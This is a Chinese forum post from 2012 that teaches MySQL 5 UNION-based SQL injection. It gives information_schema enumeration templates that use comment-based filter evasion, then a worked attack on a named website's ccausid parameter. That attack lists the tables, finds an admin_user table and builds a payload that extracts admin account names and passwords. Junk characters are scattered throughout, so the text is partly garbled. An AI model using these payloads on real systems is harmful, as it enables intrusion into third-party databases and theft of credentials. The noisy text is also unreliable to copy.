查库( H! Y( f8 Y6 V; K( V& C3 J
3 e# T. z/ `: v+ |9 V
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
* t( ` |" d j0 c8 n% @& t2 |
$ ?$ x* J7 Z5 B# e* I8 A1 ^查表" f: U/ i8 y( R3 K
7 V9 X7 H3 l* q, w4 [7 o
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1& z' W6 D8 D- L1 z0 K$ m
& [3 N$ G( n) q; }$ w4 z' s
查段) r! G$ V' N3 `1 ? ^: L+ M K
\, }+ G0 R. Q" w% r0 `
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
$ H" J5 D$ R4 b# i
; d0 o; }, g$ z: b7 {' T% a7 @/ s: J6 H! }& A! D6 R+ w. l3 `
mysql5高级注入方法暴表& W+ _# }$ C6 {
) F* J* k( U+ E& x6 }8 H8 `
例子如下:3 W% H0 ]; z" z6 a {% {( c' P
: Q/ `& R1 Y) a: b4 D
1.爆表
! ^9 h* W2 Y1 K# q. ?, N4 M1 dhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet) ^; V' {+ W" v, P
这样爆到第4个时出现了admin_user表。
. ^2 F& X8 R; P1 a$ w/ r V3 _
7 L+ p8 v( U* p/ A# j! y0 l! K2.暴字段7 K+ v* L% Z* V- @9 |: Y* U
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*0 l! x7 i' w1 r/ L3 u2 b V: l
8 r" c( L- F/ r; N8 M8 B2 F9 f- k0 P! G& P4 p
3.爆密码
; F* y# k" [4 \! i% N' l p: bhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
$ C8 ?6 v; }+ _- M& d1 N& M* \ Z7 I$ i3 |% h3 C( M7 l. U) U
! F/ @( n$ _% w7 H( a$ o5 Z
|
发表于 2012-9-13 16:29:37
收藏
分享
支持
反对